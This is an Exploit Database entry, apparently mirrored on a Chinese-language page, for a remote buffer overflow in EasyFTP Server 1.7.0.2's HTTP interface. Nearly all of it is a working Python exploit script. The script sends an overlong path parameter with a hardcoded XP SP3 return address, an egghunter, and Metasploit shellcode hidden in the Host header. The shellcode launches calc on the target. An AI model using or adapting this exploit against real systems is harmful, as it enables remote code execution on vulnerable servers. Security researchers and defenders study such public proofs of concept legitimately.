EasyFTP Server 1.7.0.2 – ‘HTTP’ Remote Buffer Overflow

• Exploit Database
• 28 阅读

• 作者： ThE g0bL!N
  日期： 2010-02-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11500/

• # Exploit Title: Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit
  # Date: 18-02-2010
  # Author: ThE g0bL!N
  # Software Link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
  # Code :
  #!/usr/bin/python
  
  import sys
  import socket
  import base64
  
  if len(sys.argv) != 4:
  print "\n****************************************************"
  print "[*] Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit\n"
  print "[*] Usage : ./sploit.py <target_ip> <user> <password>\n"
  print "[*] Example : ./sploit.py 192.168.1.3 anonymous w00t\n"
  print "*****************************************************"
  sys.exit(0)
  
  user = sys.argv[2]
  pwd = sys.argv[3]
  auth = base64.b64encode(user+":"+pwd)
  
  # win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
  shellcode=(
  "\x44\x7A\x32\x37\x44\x7A\x32\x37"
  "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
  "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
  "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
  "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
  "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
  "\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x38\x4e\x47"
  "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
  "\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
  "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
  "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
  "\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x58"
  "\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x54"
  "\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x58"
  "\x41\x50\x4b\x4e\x49\x58\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x33"
  "\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x43\x45\x58\x42\x4c\x4a\x57"
  "\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
  "\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
  "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x43"
  "\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
  "\x42\x35\x4a\x56\x50\x57\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59"
  "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x46"
  "\x4e\x36\x43\x36\x42\x50\x5a")
  
  egghunter=(
  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
  "\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
  
  buf = "\x61"*268
  buf += "\xF0\x69\x83\x7C" #CALL ESP XP SP3
  buf += "\x63"*8
  buf += egghunter
  
  head = "GET /list.html?path="+buf+" HTTP/1.1\r\n"
  head += "Host: "+shellcode+"\r\n"
  head += "Authorization: Basic "+auth+"\r\n"
  
  try:
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect((sys.argv[1],8080))
  s.send(head + "\r\n")
  print "[x] Payload sended waiting for shellcode..."
  s.close()
  except:
  print "Error!"